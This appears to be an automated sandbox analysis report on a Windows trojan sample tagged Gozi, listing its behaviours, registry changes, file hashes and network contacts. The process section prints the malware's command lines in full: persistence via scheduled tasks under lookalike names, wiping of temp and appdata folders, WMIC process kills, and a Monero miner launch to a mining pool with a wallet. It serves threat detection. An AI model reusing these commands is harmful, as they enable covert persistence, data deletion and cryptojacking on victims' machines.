Analysis Overview
SHA256
7ae4237b70f7233f779dbcde9db944e13472a1c4097baa4a17f5e769e0869476
Threat Level: Known bad
The file SecuriteInfo.com.Trojan.Siggen17.24708.25098.10939 was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks computer location settings
Checks BIOS information in registry
Checks whether UAC is enabled
Adds Run key to start application
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Runs ping.exe
Suspicious use of FindShellTrayWindow
Suspicious behavior: LoadsDriver
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Kills process with WMI
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-21 20:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-21 20:22
Reported
2022-03-21 20:24
Platform
win7-20220311-en
Max time kernel
4294183s
Max time network
125s
Command Line
Signatures
Gozi, Gozi IFSB
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
C:\Windows\system32\cmd.exe
"cmd.exe" /C erase %temp% /f /s /q
C:\Windows\system32\cmd.exe
"cmd.exe" /C choice /C Y /N /D Y /T 1 & Del "Win32WebViewHost.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 1
Network
Files
memory/1876-54-0x000007FEFB711000-0x000007FEFB713000-memory.dmp
\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
| MD5 | 1a920323a0ed2324306d0167b988da83 |
| SHA1 | 6dfc6eda6650b3d504fad10c201e4d8a695ccc40 |
| SHA256 | 3bdc94ccfd1c779c5d9b34b7ad39bcbc508df8d93968732e5a7bf91b0bab7b6d |
| SHA512 | 2cc675d728ab179cac011e988b3ad9974de5203209c42226350cb1cef233b91cff5935a12058b66354801aa82e80a0e6d92367faa7dfa8896473786b864ce15d |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
| MD5 | 1a920323a0ed2324306d0167b988da83 |
| SHA1 | 6dfc6eda6650b3d504fad10c201e4d8a695ccc40 |
| SHA256 | 3bdc94ccfd1c779c5d9b34b7ad39bcbc508df8d93968732e5a7bf91b0bab7b6d |
| SHA512 | 2cc675d728ab179cac011e988b3ad9974de5203209c42226350cb1cef233b91cff5935a12058b66354801aa82e80a0e6d92367faa7dfa8896473786b864ce15d |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
| MD5 | 1a920323a0ed2324306d0167b988da83 |
| SHA1 | 6dfc6eda6650b3d504fad10c201e4d8a695ccc40 |
| SHA256 | 3bdc94ccfd1c779c5d9b34b7ad39bcbc508df8d93968732e5a7bf91b0bab7b6d |
| SHA512 | 2cc675d728ab179cac011e988b3ad9974de5203209c42226350cb1cef233b91cff5935a12058b66354801aa82e80a0e6d92367faa7dfa8896473786b864ce15d |
memory/2004-58-0x000000003F2C0000-0x000000003F2CE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Wm0PrvSE.e_
| MD5 | b61ae72b50a40197085687a8df2c4f32 |
| SHA1 | ccc71c89853966f7001c6ea43287d9c396884bc6 |
| SHA256 | a262c8414eafbd3587c395b4a6b08ba010efcb4681c1759396386de7d223a50b |
| SHA512 | 83ce36d6bf70f2afc0bb07f403f797e2b3207501fe67a94ae69c5ae8f2530f8bd31fea6b8ad5c1f97fcff046818f2adfd1b16ed2ab89a601d15bb4162bc7c1ae |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Runt0meBroker.e_
| MD5 | 9566c78215179132d7ad6b1c1b565b46 |
| SHA1 | 35fdcb1e7b0dcde4f911517bb53035b9756d9814 |
| SHA256 | f48ef29dad391063386c2e8e324751c04e131f214f5e3b43ee38b0581243879b |
| SHA512 | 5cfe60e44656dfee596b90f7fbb8633c8f88e105f17c5cfbce92a01306c4e1d996a02b288e283cfaf3d8b3440685ca5ec7d8b6999463dca64e8262228ef912c7 |
memory/2004-61-0x000007FEF4F80000-0x000007FEF596C000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-21 20:22
Reported
2022-03-21 20:24
Platform
win10v2004-en-20220113
Max time kernel
72s
Max time network
118s
Command Line
Signatures
Gozi, Gozi IFSB
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Executes dropped EXE
Checks BIOS information in registry
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntÑ–meBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmÑ–PrvSE.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmÑ–PrvSE.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe | N/A |
Drops file in System32 directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\System32\cleanmgr.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\dismhost.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0004 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\System32\cleanmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0015 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0015 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0004 | C:\Windows\System32\cleanmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 | C:\Windows\System32\cleanmgr.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Kills process with WMI
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen17.24708.25098.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "WmÑ–PrvSE" /tr "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmÑ–PrvSE.exe" /f
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "RuntÑ–meBroker" /tr "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntÑ–meBroker.exe" /f
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping -n 1 127.0.0.1 & xcopy /h /r /y /z /c /i "WmÑ–PrvSE.exe" "%userprofile%\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\" & ping -n 4 127.0.0.1 & erase %temp% /s /f /q
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping -n 1 127.0.0.1 & xcopy /h /r /y /z /c /i "RuntÑ–meBroker.exe" "%userprofile%\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\"
C:\Windows\system32\PING.EXE
ping -n 1 127.0.0.1
C:\Windows\system32\PING.EXE
ping -n 1 127.0.0.1
C:\Windows\system32\xcopy.exe
xcopy /h /r /y /z /c /i "RuntÑ–meBroker.exe" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\"
C:\Windows\system32\xcopy.exe
xcopy /h /r /y /z /c /i "WmÑ–PrvSE.exe" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\"
C:\Windows\system32\PING.EXE
ping -n 4 127.0.0.1
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmÑ–PrvSE.exe
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmÑ–PrvSE.exe
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntÑ–meBroker.exe
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntÑ–meBroker.exe
C:\Windows\System32\cleanmgr.exe
"C:\Windows\System32\cleanmgr.exe" /setup
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\dismhost.exe {F243B500-D086-4018-A5D7-26A3B538A770}
C:\Windows\system32\cmd.exe
"cmd.exe" /C erase %temp% /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' call terminate
C:\Windows\system32\cmd.exe
"cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' delete
C:\Windows\system32\cmd.exe
"cmd.exe" /C ping -n 2 127.0.0.1>%temp%\log2 && rd /s /q %appdata%\Sysfiles & rd /s /q %temp%
C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
C:\Windows\System32\Wbem\WMIC.exe
wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' delete
C:\Windows\system32\cmd.exe
"cmd.exe" /C erase %temp% /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' delete
C:\Windows\system32\cmd.exe
"cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & ping -n 10 127.0.0.1>%temp%\log1 && erase %temp% /s /f /q & rd /s /q %appdata%\Sysfiles
C:\Windows\system32\cmd.exe
"cmd.exe" /C erase %appdata%\Sysfiles /s /f /q & wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' call terminate
C:\Windows\System32\Wbem\WMIC.exe
wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' call terminate
C:\Windows\system32\PING.EXE
ping -n 10 127.0.0.1
C:\Windows\System32\Wbem\WMIC.exe
wmic PROCESS WHERE 'ExecutablePath LIKE '%TEMP\\%'' call terminate
C:\Windows\System32\Wbem\WMIC.exe
wmic PROCESS WHERE 'ExecutablePath LIKE '%\\appdata\\roaming\\sysfiles\\%'' delete
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe
"C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\HxTsr.exe" -o gulf.moneroocean.stream:20128 -u 46vJx3eY8qKgUN5cPxr81MjnNASPRxpp7fDKWXPYp93Fj6zhGPRLR7BM6FNQNGgTK6R5Pz3V55bvn5jLMmu6VWuJQcMk3ZL -p x -k -v=0 --cpu-no-yield --randomx-cache-qos --tls -t 1
Network
| Country | Destination | Domain | Proto |
| NL | 104.110.191.133:80 | tcp | |
| NL | 104.110.191.133:80 | tcp | |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 199.247.0.216:20128 | gulf.moneroocean.stream | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
| MD5 | 1a920323a0ed2324306d0167b988da83 |
| SHA1 | 6dfc6eda6650b3d504fad10c201e4d8a695ccc40 |
| SHA256 | 3bdc94ccfd1c779c5d9b34b7ad39bcbc508df8d93968732e5a7bf91b0bab7b6d |
| SHA512 | 2cc675d728ab179cac011e988b3ad9974de5203209c42226350cb1cef233b91cff5935a12058b66354801aa82e80a0e6d92367faa7dfa8896473786b864ce15d |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Win32WebViewHost.exe
| MD5 | 1a920323a0ed2324306d0167b988da83 |
| SHA1 | 6dfc6eda6650b3d504fad10c201e4d8a695ccc40 |
| SHA256 | 3bdc94ccfd1c779c5d9b34b7ad39bcbc508df8d93968732e5a7bf91b0bab7b6d |
| SHA512 | 2cc675d728ab179cac011e988b3ad9974de5203209c42226350cb1cef233b91cff5935a12058b66354801aa82e80a0e6d92367faa7dfa8896473786b864ce15d |
memory/1460-132-0x0000000000540000-0x000000000054E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Runt0meBroker.e_
| MD5 | 9566c78215179132d7ad6b1c1b565b46 |
| SHA1 | 35fdcb1e7b0dcde4f911517bb53035b9756d9814 |
| SHA256 | f48ef29dad391063386c2e8e324751c04e131f214f5e3b43ee38b0581243879b |
| SHA512 | 5cfe60e44656dfee596b90f7fbb8633c8f88e105f17c5cfbce92a01306c4e1d996a02b288e283cfaf3d8b3440685ca5ec7d8b6999463dca64e8262228ef912c7 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Wm0PrvSE.e_
| MD5 | b61ae72b50a40197085687a8df2c4f32 |
| SHA1 | ccc71c89853966f7001c6ea43287d9c396884bc6 |
| SHA256 | a262c8414eafbd3587c395b4a6b08ba010efcb4681c1759396386de7d223a50b |
| SHA512 | 83ce36d6bf70f2afc0bb07f403f797e2b3207501fe67a94ae69c5ae8f2530f8bd31fea6b8ad5c1f97fcff046818f2adfd1b16ed2ab89a601d15bb4162bc7c1ae |
memory/1460-135-0x00007FFE82B80000-0x00007FFE83641000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{1edeee53-0afe-4609-b846-dbc1b2015b1a}\WmÑ–PrvSE.exe
| MD5 | b61ae72b50a40197085687a8df2c4f32 |
| SHA1 | ccc71c89853966f7001c6ea43287d9c396884bc6 |
| SHA256 | a262c8414eafbd3587c395b4a6b08ba010efcb4681c1759396386de7d223a50b |
| SHA512 | 83ce36d6bf70f2afc0bb07f403f797e2b3207501fe67a94ae69c5ae8f2530f8bd31fea6b8ad5c1f97fcff046818f2adfd1b16ed2ab89a601d15bb4162bc7c1ae |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntÑ–meBroker.exe
| MD5 | 9566c78215179132d7ad6b1c1b565b46 |
| SHA1 | 35fdcb1e7b0dcde4f911517bb53035b9756d9814 |
| SHA256 | f48ef29dad391063386c2e8e324751c04e131f214f5e3b43ee38b0581243879b |
| SHA512 | 5cfe60e44656dfee596b90f7fbb8633c8f88e105f17c5cfbce92a01306c4e1d996a02b288e283cfaf3d8b3440685ca5ec7d8b6999463dca64e8262228ef912c7 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\Input_{e23b33b0-c8c9-472c-a5f9-f2bdfea0f156}\RuntÑ–meBroker.exe
| MD5 | 9566c78215179132d7ad6b1c1b565b46 |
| SHA1 | 35fdcb1e7b0dcde4f911517bb53035b9756d9814 |
| SHA256 | f48ef29dad391063386c2e8e324751c04e131f214f5e3b43ee38b0581243879b |
| SHA512 | 5cfe60e44656dfee596b90f7fbb8633c8f88e105f17c5cfbce92a01306c4e1d996a02b288e283cfaf3d8b3440685ca5ec7d8b6999463dca64e8262228ef912c7 |
memory/3452-139-0x0000000000250000-0x0000000000262000-memory.dmp
memory/3452-140-0x00007FFE824D0000-0x00007FFE82F91000-memory.dmp
memory/4720-141-0x00007FFE9FB00000-0x00007FFE9FDC9000-memory.dmp
memory/4720-143-0x0000000180000000-0x0000000180046000-memory.dmp
memory/4720-148-0x00007FFE9FB00000-0x00007FFE9FDC9000-memory.dmp
memory/4720-149-0x00007FFEA05F0000-0x00007FFEA06AE000-memory.dmp
memory/4720-150-0x00007FFE80000000-0x00007FFE80002000-memory.dmp
memory/4720-151-0x00007FFE80030000-0x00007FFE80031000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\DismHost.exe
| MD5 | e5d5e9c1f65b8ec7aa5b7f1b1acdd731 |
| SHA1 | dbb14dcda6502ab1d23a7c77d405dafbcbeb439e |
| SHA256 | e30508e2088bc16b2a84233ced64995f738deaef2366ac6c86b35c93bbcd9d80 |
| SHA512 | 7cf80d4a16c5dbbf61fcb22ebe30cf78ca42a030b7d7b4ad017f28fba2c9b111e8cf5b3064621453a44869bbaed124d6fb1e8d2c8fe8202f1e47579d874fa4bc |
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\DismCorePS.dll
| MD5 | a033f16836d6f8acbe3b27b614b51453 |
| SHA1 | 716297072897aea3ec985640793d2cdcbf996cf9 |
| SHA256 | e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e |
| SHA512 | ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871 |
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\DismCorePS.dll
| MD5 | a033f16836d6f8acbe3b27b614b51453 |
| SHA1 | 716297072897aea3ec985640793d2cdcbf996cf9 |
| SHA256 | e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e |
| SHA512 | ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871 |
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\dismprov.dll
| MD5 | 490be3119ea17fa29329e77b7e416e80 |
| SHA1 | c71191c3415c98b7d9c9bbcf1005ce6a813221da |
| SHA256 | ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a |
| SHA512 | 6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13 |
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\DismProv.dll
| MD5 | 490be3119ea17fa29329e77b7e416e80 |
| SHA1 | c71191c3415c98b7d9c9bbcf1005ce6a813221da |
| SHA256 | ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a |
| SHA512 | 6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13 |
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\OSProvider.dll
| MD5 | db4c3a07a1d3a45af53a4cf44ed550ad |
| SHA1 | 5dea737faadf0422c94f8f50e9588033d53d13b3 |
| SHA256 | 2165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758 |
| SHA512 | 5182b80459447f3c1fb63b70ad0370e1da26828a7f73083bec0af875b37888dd12ec5a6d9dc84157fc5b535f473ad7019eb6a53b9a47a2e64e6a8b7fae4cddde |
C:\Users\Admin\AppData\Local\Temp\4AC90018-84CB-48EA-9AD8-D010F46D4D15\OSProvider.dll
| MD5 | db4c3a07a1d3a45af53a4cf44ed550ad |
| SHA1 | 5dea737faadf0422c94f8f50e9588033d53d13b3 |
| SHA256 | 2165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758 |
